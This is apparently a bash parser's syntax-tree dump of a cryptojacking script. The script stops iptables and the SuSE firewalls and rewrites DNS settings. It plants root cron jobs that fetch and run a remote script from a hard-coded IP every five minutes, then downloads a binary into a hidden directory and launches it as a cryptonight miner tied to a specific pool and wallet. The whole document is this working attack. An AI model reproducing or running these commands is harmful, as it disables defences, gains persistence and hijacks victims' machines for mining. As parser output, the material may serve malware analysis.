ListNode(lineno=2, pos=(12, 99), parts=[
  CommandNode(lineno=2, pos=(12, 37), parts=[
    WordNode(lineno=2, pos=(12, 32), word='/etc/init.d/iptables'),
    WordNode(lineno=2, pos=(33, 37), word='stop'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(37, 38)),
  CommandNode(lineno=2, pos=(38, 59), parts=[
    WordNode(lineno=2, pos=(38, 45), word='service'),
    WordNode(lineno=2, pos=(46, 54), word='iptables'),
    WordNode(lineno=2, pos=(55, 59), word='stop'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(59, 60)),
  CommandNode(lineno=2, pos=(60, 78), parts=[
    WordNode(lineno=2, pos=(60, 73), word='SuSEfirewall2'),
    WordNode(lineno=2, pos=(74, 78), word='stop'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(78, 79)),
  CommandNode(lineno=2, pos=(79, 99), parts=[
    WordNode(lineno=2, pos=(79, 94), word='reSuSEfirewall2'),
    WordNode(lineno=2, pos=(95, 99), word='stop'),
  ]),
])
CommandNode(lineno=3, pos=(100, 143), parts=[
  WordNode(lineno=3, pos=(100, 104), word='echo'),
  WordNode(lineno=3, pos=(105, 125), word='nameserver 8.8.8.8'),
  RedirectNode(lineno=3, output=
    WordNode(lineno=3, pos=(127, 143), word='/etc/resolv.conf'), pos=(125, 143), type='>'),
])
CommandNode(lineno=4, pos=(144, 187), parts=[
  WordNode(lineno=4, pos=(144, 148), word='echo'),
  RedirectNode(lineno=4, output=
    WordNode(lineno=4, pos=(152, 168), word='/etc/resolv.conf'), pos=(149, 168), type='>>'),
  WordNode(lineno=4, pos=(169, 179), word='nameserver'),
  WordNode(lineno=4, pos=(180, 187), word='8.8.4.4'),
])
CommandNode(lineno=5, pos=(188, 272), parts=[
  WordNode(lineno=5, pos=(188, 192), word='echo'),
  WordNode(lineno=5, pos=(193, 249), word='*/5 * * * * curl -fsSL http://185.244.25.191/i.sh | sh'),
  RedirectNode(lineno=5, output=
    WordNode(lineno=5, pos=(252, 272), word='/var/spool/cron/root'), pos=(250, 272), type='>'),
])
CommandNode(lineno=6, pos=(273, 359), parts=[
  WordNode(lineno=6, pos=(273, 277), word='echo'),
  WordNode(lineno=6, pos=(278, 335), word='*/5 * * * * wget -q -O- http://185.244.25.191/i.sh | sh'),
  RedirectNode(lineno=6, output=
    WordNode(lineno=6, pos=(339, 359), word='/var/spool/cron/root'), pos=(336, 359), type='>>'),
])
CommandNode(lineno=7, pos=(360, 393), parts=[
  WordNode(lineno=7, pos=(360, 365), word='mkdir'),
  WordNode(lineno=7, pos=(366, 368), word='-p'),
  WordNode(lineno=7, pos=(369, 393), word='/var/spool/cron/crontabs'),
])
CommandNode(lineno=8, pos=(394, 487), parts=[
  WordNode(lineno=8, pos=(394, 398), word='echo'),
  WordNode(lineno=8, pos=(399, 455), word='*/5 * * * * curl -fsSL http://185.244.25.191/i.sh | sh'),
  RedirectNode(lineno=8, output=
    WordNode(lineno=8, pos=(458, 487), word='/var/spool/cron/crontabs/root'), pos=(456, 487), type='>'),
])
CommandNode(lineno=9, pos=(488, 583), parts=[
  WordNode(lineno=9, pos=(488, 492), word='echo'),
  WordNode(lineno=9, pos=(493, 550), word='*/5 * * * * wget -q -O- http://185.244.25.191/i.sh | sh'),
  RedirectNode(lineno=9, output=
    WordNode(lineno=9, pos=(554, 583), word='/var/spool/cron/crontabs/root'), pos=(551, 583), type='>>'),
])
CompoundNode(lineno=16, list=[
  IfNode(lineno=16, pos=(587, 1230), parts=[
    ReservedwordNode(lineno=10, pos=(587, 589), word='if'),
    ListNode(lineno=10, pos=(590, 620), parts=[
        CommandNode(lineno=10, pos=(590, 619), parts=[
          WordNode(lineno=10, pos=(590, 591), word='['),
          WordNode(lineno=10, pos=(592, 593), word='!'),
          WordNode(lineno=10, pos=(594, 596), word='-f'),
          WordNode(lineno=10, pos=(597, 617), word='/usr/lib/local/.zh'),
          WordNode(lineno=10, pos=(618, 619), word=']'),
        ]),
        OperatorNode(lineno=10, op=';', pos=(619, 620)),
      ]),
    ReservedwordNode(lineno=11, pos=(624, 628), word='then'),
    ListNode(lineno=13, pos=(637, 948), parts=[
        CommandNode(lineno=12, pos=(637, 664), parts=[
          WordNode(lineno=12, pos=(637, 642), word='mkdir'),
          WordNode(lineno=12, pos=(643, 645), word='-p'),
          WordNode(lineno=12, pos=(646, 664), word='/usr/local/lib/.zh'),
        ]),
        OperatorNode(lineno=13, op='\n', pos=(664, 665)),
        CommandNode(lineno=13, pos=(673, 728), parts=[
          WordNode(lineno=13, pos=(673, 677), word='wget'),
          WordNode(lineno=13, pos=(678, 701), word='http://185.244.25.191/x'),
          WordNode(lineno=13, pos=(702, 704), word='-O'),
          WordNode(lineno=13, pos=(705, 728), word='/usr/local/lib/.zh/  '),
        ]),
        OperatorNode(lineno=13, op=';', pos=(729, 730)),
        CommandNode(lineno=13, pos=(730, 752), parts=[
          WordNode(lineno=13, pos=(730, 732), word='cd'),
          WordNode(lineno=13, pos=(733, 752), word='/usr/local/lib/.zh/'),
        ]),
        OperatorNode(lineno=13, op=';', pos=(752, 753)),
        CommandNode(lineno=13, pos=(754, 768), parts=[
          WordNode(lineno=13, pos=(754, 759), word='chmod'),
          WordNode(lineno=13, pos=(760, 763), word='777'),
          WordNode(lineno=13, pos=(764, 768), word='  '),
        ]),
        OperatorNode(lineno=13, op=';', pos=(768, 769)),
        CommandNode(lineno=13, pos=(769, 946), parts=[
          WordNode(lineno=13, pos=(769, 775), word='./  '),
          WordNode(lineno=13, pos=(776, 778), word='-a'),
          WordNode(lineno=13, pos=(779, 790), word='cryptonight'),
          WordNode(lineno=13, pos=(791, 793), word='-o'),
          WordNode(lineno=13, pos=(794, 824), word='stratum+tcp://176.9.53.68:5555'),
          WordNode(lineno=13, pos=(825, 827), word='-u'),
          WordNode(lineno=13, pos=(828, 923), word='47rT5wSPhzE5HmgYieKEn8ac8S4Qne7JmZT4D2u3mFKPBmKBXF7frEsSmMd41MNuFNMTbc3xTdUzhJ51qi9XWDs1GnwUhKU'),
          WordNode(lineno=13, pos=(924, 926), word='-p'),
          WordNode(lineno=13, pos=(927, 928), word='x'),
          WordNode(lineno=13, pos=(929, 931), word='-k'),
          WordNode(lineno=13, pos=(932, 934), word='-B'),
          RedirectNode(lineno=13, output=
            WordNode(lineno=13, pos=(937, 946), word='/dev/null'), pos=(935, 946), type='>>'),
        ]),
        OperatorNode(lineno=13, op='&', pos=(947, 948)),
      ]),
    ReservedwordNode(lineno=14, pos=(961, 965), word='else'),
    ListNode(lineno=15, pos=(973, 1218), parts=[
        CommandNode(lineno=15, pos=(973, 1026), parts=[
          WordNode(lineno=15, pos=(973, 977), word='curl'),
          WordNode(lineno=15, pos=(978, 981), word='-O-'),
          WordNode(lineno=15, pos=(982, 1005), word='http://185.244.25.191/x'),
          WordNode(lineno=15, pos=(1006, 1008), word='-O'),
          WordNode(lineno=15, pos=(1009, 1026), word='/usr/lib/.zh/  '),
        ]),
        OperatorNode(lineno=15, op=';', pos=(1027, 1028)),
        CommandNode(lineno=15, pos=(1029, 1038), parts=[
          WordNode(lineno=15, pos=(1029, 1034), word='chmod'),
          WordNode(lineno=15, pos=(1035, 1038), word='777'),
        ]),
        OperatorNode(lineno=15, op=';', pos=(1038, 1039)),
        CommandNode(lineno=15, pos=(1039, 1216), parts=[
          WordNode(lineno=15, pos=(1039, 1045), word='./  '),
          WordNode(lineno=15, pos=(1046, 1048), word='-a'),
          WordNode(lineno=15, pos=(1049, 1060), word='cryptonight'),
          WordNode(lineno=15, pos=(1061, 1063), word='-o'),
          WordNode(lineno=15, pos=(1064, 1094), word='stratum+tcp://176.9.53.68:5555'),
          WordNode(lineno=15, pos=(1095, 1097), word='-u'),
          WordNode(lineno=15, pos=(1098, 1193), word='47rT5wSPhzE5HmgYieKEn8ac8S4Qne7JmZT4D2u3mFKPBmKBXF7frEsSmMd41MNuFNMTbc3xTdUzhJ51qi9XWDs1GnwUhKU'),
          WordNode(lineno=15, pos=(1194, 1196), word='-p'),
          WordNode(lineno=15, pos=(1197, 1198), word='x'),
          WordNode(lineno=15, pos=(1199, 1201), word='-k'),
          WordNode(lineno=15, pos=(1202, 1204), word='-B'),
          RedirectNode(lineno=15, output=
            WordNode(lineno=15, pos=(1207, 1216), word='/dev/null'), pos=(1205, 1216), type='>>'),
        ]),
        OperatorNode(lineno=15, op='&', pos=(1217, 1218)),
      ]),
    ReservedwordNode(lineno=16, pos=(1228, 1230), word='fi'),
  ]),
], pos=(587, 1230))
